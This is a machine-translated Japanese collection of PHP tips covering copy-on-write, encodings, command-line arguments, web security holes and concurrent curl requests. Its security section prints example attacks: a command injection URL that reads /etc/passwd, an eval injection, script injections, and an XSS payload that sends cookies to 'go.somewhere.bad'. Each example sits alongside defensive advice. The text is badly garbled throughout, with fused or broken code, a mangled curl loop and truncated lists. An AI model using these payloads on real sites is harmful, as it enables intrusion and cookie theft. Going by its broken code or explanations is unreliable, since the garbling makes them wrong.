上記のコードでは、参照によって $a 配列を printArray() 関数に渡します。zend エンジンは printArray() によって $a が変更される可能性があると判断し、この時点で $a データを自動的に生成します。 $b. メモリをコピーして、ストレージに再適用します。これが、前述した「参照カウント、コピーオンライト」の概念です。
直感的な理解: $a は独自の元のメモリ空間を使用し、$b は新しく開かれたメモリ空間を使用し、この空間は $a の元の ($a または $b が変更される前) コンテンツ空間の内容を使用します。これをコピーして、対応する変更を加えます。
5. エンコーディングの問題
結果: ANSI=9 および utf-8=11、utf-8 の中国語文字エンコーディングは 3 バイトです。文字数を取得するには、mb_strlen()を使用します。
6. PHP でパラメータを取得する 3 つの方法
コードは次のとおりです: if ($argc > 1){
print_r($argv);コマンドラインから /usr/local/php/bin/php ./getopt.php -f 123 -g 456
を実行します。
実行結果:
> -F= [2] = & gt; -g
[4] = & gt;
方法 2 は getopt 関数を使用します ()
コードをコピーします
コードは次のとおりです:
$options = "f:g:"
$opts = getopt( $options ); ($opts) ;
/usr/local/php/bin/php ./getopt.php -f 123 -g 456 の実行結果:
Array ] => 456 )
方法 3: ユーザーに入力を求め、入力パラメーターを取得します。 C言語に少し似ています
コードをコピーします
コードは次のとおりです:
fwrite(STDOUT, "Enter your name: ");
$name = trim(fgets(STDIN)); (STDOUT, "Hello , $name!");
コマンドラインで /usr/local/php/bin/php ./getopt.php を実行します
実行結果
名前を入力してください: francis こんにちは、francis!
7. PHP 文字列は、C ポインター文字列と同様に配列として扱うことができます
コードをコピーします
コードは次のとおりです。
$s = '12345'; $s [$s[0]] = 0;
$s ?>
結果は10345です
8. PHPの効率的な書き方:
9. PHPのセキュリティ上の脆弱性:
PHP Webサイトに対する攻撃手法は主に以下のとおりです。
1. コマンドインジェクション
PHP で次の 5 つの関数を使用して、外部アプリケーションまたは関数を実行できます: system、exec、passthru、shell_exec、"(shell_exec と同じ関数)
例:
コードをコピーします コードは次のとおりです:
< ;?php
$dir = $_GET["dir"];
if (isset($dir)) { echo "";
system("ls -al ".$dir"; ;
}
?>
http://www.test.com/ex1.php?dir=| cat /etc/passwd を送信すると、コマンドは system("ls -al | cat /etc/ passwd") ; 弊社サーバーのユーザー情報が盗まれた可能性があります。
2. エバルインジェクション
eval 関数は、入力文字列パラメーターを PHP プログラム コードとして実行します。Eval インジェクションは通常、攻撃者が入力文字列を制御できる場合に発生します。
コードをコピーします
コードは次のとおりです:$var = "var";
if (isset($_GET["arg"]))
{
$arg = $_GET["arg "];
eval("$var = $arg;");
echo "$var =".$var;
}
?>
http://www.sectop.com/ex2.php?arg=phpinfo(); を送信すると、脆弱性が発生します。
コマンドインジェクションとevalインジェクションを防ぐ方法
1) 外部コマンドを実行しないようにしてください。
2) カスタム関数または関数ライブラリを使用して外部コマンドの関数を置き換えます。サーバーによっては、これらの関数の使用を直接禁止している場合もあります。
3) コマンドパラメータを処理するには、escapeshellarg 関数を使用します。esacpeshellarg 関数は、パラメータまたはコマンドの終了を引き起こす文字をエスケープします。一重引用符「'」は「'」に置き換えられ、二重引用符は「"」に置き換えられます。 """ 、セミコロン ";" を ";" に置き換えます
3. クライアント側のスクリプト攻撃 (スクリプト挿入)
クライアントサイドスクリプト埋め込み攻撃手順
1) 攻撃者は通常のユーザーとして登録した後、Web サイトにログインします。
2) メッセージページを開き、攻撃用のJSコードを挿入します
3) 他のユーザー (管理者を含む) が Web サイトにログインし、このメッセージの内容を閲覧します
4) メッセージ内容に隠されていたjsコードが実行され、攻撃が成功しました
フォームには、ブラウザが実行できるいくつかのスクリプトが入力されます:
<script>while(1){windows.open();}</script>無限ポップアップボックスを挿入します
<script>location.href="http://www.sectop.com";</script> を挿入すると、フィッシング ページにジャンプします
悪意のある HTML タグを防ぐ最善の方法は、htmlspecailchars または htmlentities を使用して特定の文字列を HTML エンティティに変換します。
4. クロスサイトスクリプティング (XSS)
悪意のある攻撃者は、Web ページに悪意のある HTML コードを挿入します。ユーザーがページを閲覧すると、Web に埋め込まれた HTML コードが実行され、悪意のあるユーザーの特別な目的が達成されます。
クロスサイト スクリプティングは、攻撃者が Web サイト ユーザーの Cookie やその他の個人データを読み取るために主に使用され、攻撃者がこのデータを取得すると、このユーザーになりすまして Web サイトにログインし、このユーザーの許可を取得することができます。
クロスサイトスクリプティング攻撃の一般的な手順:
1) 攻撃者は、コメント フォームなどの何らかの方法で xss http リンクをターゲット ユーザーに送信します。
<script>document.location= “go.somewhere.bad?cookie=+”this.cookie</script>を挿入します
またはリンク:
http://w w w.my.site/index.php?user=
コードは次のとおりです。 PHP PDO::prepare() およびexecute() $preparedStatement = $db-> prepare('INSERT INTO table (column) VALUES (:column)');
$preparedStatement->execute(array(':column' => $unsafeValue)); mysqli:
を使用します。
コードをコピーします
コードは次のとおりです:
$stmt = $dbConnection->prepare('SELECT * FROM従業員 WHERE name = ?'); $stmt->bind_param('s', $name);
$ stmt->execute();
$result = $stmt->get_result();
while ($row = $result->fetch_assoc()) {
// $row で何かをする
}
6. クロスサイトリクエストフォージェリ (CSRF)
7. セッションハイジャック
8. セッションの固定
9. HTTP レスポンスの分割
10. ファイルアップロード攻撃
11. ディレクトリトラバーサル
12. リモートファイルインクルージョン攻撃(Remote Inclusion)
13. 動的関数注入攻撃(動的変数評価)
14. URL攻撃
15. なりすましフォームの送信
16. スプーフィングされた HTTP リクエスト
いくつかの重要な php.ini オプション: register_globals、magic_quotes、safe_mode。 これらのオプションは PHP5.4 で非推奨になります。
register_globals:
php>=4.2.0、register_globals
の場合、php.ini の register_globals オプションのデフォルト値はオフです。
が On に設定されている場合、プログラムはフォームによって送信された変数を含むさまざまな環境変数をサーバーから受け取ることができます。また、PHP は変数の値を事前に初期化する必要がないため、大きなセキュリティ リスクにつながります。
register_globals が無効になっていることを確認してください。 register_globals が有効な場合、$variable を使用して GET または POST 文字列を同じ名前に置き換えるなどの不注意な行為が可能になります。この設定を無効にすると、PHP は正しい名前空間の正しい変数を参照するように強制します。フォーム POST から変数を使用するには、$_POST['variable'] を引用符で囲む必要があります。こうすることで、この特定の変数を Cookie、セッション、または GET 変数と間違えることがなくなります。
セーフモード:
セーフ モードでは、PHP はドキュメントへのアクセスを制限し、環境変数へのアクセスを制限し、外部プログラムの実行を制御するために使用されます。セーフモードを有効にするには、php.iniでsafe_mode=Onを設定する必要があります
magic_quotes
PHP プログラムの入力情報を自動的にエスケープするために使用されます。すべての一重引用符 ("'")、二重引用符 (""")、バックスラッシュ ("")、およびヌル文字 (NULL) が自動的に追加されます。バックスラッシュはエスケープされます。 =On は、Magicquotes を On に設定するために使用されます。これは、HTTP リクエスト データ (GET、POST、Cookie) に影響します。プログラマは、addslashes を使用して送信された HTTP リクエスト データをエスケープしたり、stripslashes を使用してデータを削除したりすることもできます。
10. 複数のcurlリクエストの同時使用
誰もがcurlを使用したことがあると思いますが、同時使用はそれほど多くないと推定されます。しかし、同じリクエストで複数の他のパーティのインターフェースを呼び出す場合など、場合によっては確かに便利です。従来の方法では、シリアルリクエストインターフェースが必要です:
。
file_get_contents('http://a.php');//1 秒
file_get_contents('http://b.php');//2秒
file_get_contents('http://c.php');//2秒
ここでは 5 秒かかりますが、curl の muti メソッドを操作することで、わずか 2 秒でリクエストを完了できます。次のとおりです。$ curl_multi_init();リクエストキューへの残りの接続:
参考: ブロックせずにcurl_multi()を使用する方法
コードをコピーします コードは次のとおりです:
$connomains = array(
自分で取得してください
"http://localhost/2.php?id=1",//sleep(1) 秒
"http://localhost/2. php?id=2",//sleep(2) 秒
"http://localhost/2.php?id=5",//sleep(5) 秒
);
$mh =curl_multi_init();
foreach ($connomains as $i => $url) {
$conn[$i] =curl_init($url);//各サブ接続を初期化します
curl_setopt($conn[$i] , CURLOPT_RETURNTRANSFER, 1 ); //ブラウザに直接出力しません
curl_multi_add_handle ($mh,$conn[$i]);//マルチ処理ハンドルを追加します
}
$active = 0;//接続数
do { {Do { /// ここで $ Active は現在の未処理の番号に書き換えられます
// 処理が成功した $ Active はすべて 0 になります
= Curl_multi_exec ($ mh, $ active
); // このサイクルこのサイクルの目的は、読み取りと書き込みができなくなるまで、できるだけ読み取りと書き込みを行うことです (CURLM_OK を返す) //(CURLM_CALL_MULTI_PERFORM) を返すということは、ネットワークへの読み取りと書き込みを続行できることを意味します
}while($mrc ==CURLM_CALL_MULTI_PERFORM);
// すべてが正常であれば、一定時間ごとにポーリングと再リクエストを行う必要があります (デフォルトは 1 秒)
// これは、待機プロセス中のcurl_multi_select の役割です。現在読み取りおよび書き込みできるハンドルが存在する場合はそのハンドルを返します。したがって、
//読み取りおよび書き込み操作を続行します。0 は読み取りおよび書き込みができる (完了した) ハンドルがないことを意味します
} while ($mrc ==CURLM_OK&& $active &&curl_multi_select($mh)!=-1);//エラーが発生するまで、またはすべての読み取りと書き込みが完了するまで
if ($mrc != CURLM_OK) {
print "Curl マルチ読み取りエラー $mrc/n ";
}
// データを取得します
foreach ($connomains as $i => $url) {
if (($err =curl_error($conn[$i])) == '') { {エラーハンドル $i: $err/n";
}
curl_multi_remove_handle($mh,$conn[$i]);
curl_close($conn[$i]);
curl_multi_close($mh);
print_r($res );
?>
トラブルを避けるために次のように書く人もいます:
do {curl_multi_exec($mh,$active) } while ($active);
結果が得られるように見えますが、実際には、すべてのリンクが処理されるまでこのループが呼び出され続けるため、厳密ではなく、CPU を浪費します。効果を確認するには、ループに print 'a' を追加します。
11. オブジェクト属性が空かどうかを判断するために空のマジックメソッド __get を使用しても機能しません
マジック メソッド __get を使用する場合、クラスの存在しない/非パブリック変数に対して empty() を呼び出した場合の結果は少し混乱することに注意してください (gmx dot de で nahpeps によって前述されているように)。次の例を考えてみましょう。 コードをコピーします
コードは次のとおりです:
class Registry
{
protected $_items = array();
public function __set($key, $value)
{
$this->_items[$key] = $value;
}
パブリック関数__get($ key)
}
}}}
$registry = 新しいレジストリ();
$registry->empty = '';
$registry->notEmpty = '空ではありません';
var_dump(empty($registry->notExisting)); // true、これまでのところ良好ですvar_dump(empty($registry->empty)) // true、これまでのところ良好です
var_dump($ registry->notEmpty)); // true、.. 何か?
$tmp = $registry->notEmpty;
var_dump(empty($tmp)) // 予想通り false
; 12. Linux でコマンドラインから実行される php ファイルの形式は unix である必要があります。
php ./test.php
test.phpがwindosからアップロードされた場合、その形式はdosである可能性があります。
その後、このコマンドを実行すると、エラー メッセージが表示されます: 入力ファイルを開けませんでした
vi で set ff を使用してフォーマットを表示できます:
ファイル形式=dos
dos 形式の場合は、set ff=unix を使用して新しい形式を設定する必要があります
Use:set ff を再度使用してフォーマットを確認すると、すでに UNIX フォーマットになっていることがわかります。
fileformat=unix
http://www.bkjia.com/PHPjc/326954.html
www.bkjia.com
true
http://www.bkjia.com/PHPjc/326954.html技術記事 1. PHP の暗黙的な三項演算子 (?:) の優先順位の問題: 例 1: 次のようにコードをコピーします: $person = $who または $person = "larence" //実際には次と同等です: $person = empty($who)? 「ラ…」
![[Web フロントエンド] Node.js クイック スタート](https://img.php.cn/upload/course/000/000/067/662b5d34ba7c0227.png)
